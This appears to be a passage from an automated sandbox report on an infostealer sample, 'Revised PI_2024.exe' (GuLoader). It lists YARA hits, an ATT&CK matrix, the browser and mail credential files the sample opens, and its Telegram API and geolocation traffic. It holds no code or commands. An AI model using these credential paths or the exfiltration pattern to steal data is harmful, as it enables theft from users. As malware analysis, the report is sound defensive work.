            Source: C:\Users\user\Desktop\Revised PI_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeCode function: 0_2_00405BC6 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405BC6
            Source: C:\Users\user\Desktop\Revised PI_2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000083.00000002.86892585605.000000003418C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000083.00000002.86892585605.00000000340B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000083.00000002.86892585605.00000000341C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000083.00000002.86892585605.0000000033F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Revised PI_2024.exe PID: 2496, type: MEMORYSTR
            Source: Yara matchFile source: 00000083.00000002.86892585605.00000000341C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Revised PI_2024.exe PID: 2496, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Revised PI_2024.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: Process Memory Space: Revised PI_2024.exe PID: 2496, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000083.00000002.86892585605.000000003418C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000083.00000002.86892585605.00000000340B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000083.00000002.86892585605.00000000341C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000083.00000002.86892585605.0000000033F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Revised PI_2024.exe PID: 2496, type: MEMORYSTR
            Source: Yara matchFile source: 00000083.00000002.86892585605.00000000341C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Revised PI_2024.exe PID: 2496, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Command and Scripting Interpreter
            1
            DLL Side-Loading
            11
            Process Injection
            1
            Masquerading
            1
            OS Credential Dumping
            11
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Native API
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Time Based Evasion
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Deobfuscate/Decode Files or Information
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Time Based Evasion
            Cached Domain Credentials115
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1479211 Sample: Revised PI_2024.exe Startdate: 23/07/2024 Architecture: WINDOWS Score: 100 42 reallyfreegeoip.org 2->42 44 api.telegram.org 2->44 46 4 other IPs or domains 2->46 54 Found malware configuration 2->54 56 Multi AV Scanner detection for submitted file 2->56 58 Yara detected GuLoader 2->58 64 6 other signatures 2->64 8 Revised PI_2024.exe 31 2->8         started        signatures3 60 Tries to detect the country of the analysis system (by using the IP) 42->60 62 Uses the Telegram API (likely for C&C communication) 44->62 process4 file5 34 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->34 dropped 36 C:\Users\user\AppData\Local\...\nsDialogs.dll, PE32 8->36 dropped 38 C:\Users\user\AppData\Local\...\System.dll, PE32 8->38 dropped 40 C:\Users\user\AppData\Local\...\BgImage.dll, PE32 8->40 dropped 66 Obfuscated command line found 8->66 12 Revised PI_2024.exe 15 8 8->12         started        16 cmd.exe 8->16         started        18 cmd.exe 8->18         started        20 62 other processes 8->20 signatures6 process7 dnsIp8 48 api.telegram.org 149.154.167.220, 443, 49841 TELEGRAMRU United Kingdom 12->48 50 reallyfreegeoip.org 104.21.67.152, 443, 49833, 49834 CLOUDFLARENETUS United States 12->50 52 3 other IPs or domains 12->52 68 Tries to steal Mail credentials (via file / registry access) 12->68 70 Tries to harvest and steal browser information (history, passwords, etc) 12->70 22 Conhost.exe 16->22         started        24 Conhost.exe 18->24         started        26 Conhost.exe 20->26         started        28 Conhost.exe 20->28         started        30 Conhost.exe 20->30         started        32 59 other processes 20->32 signatures9 process10

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.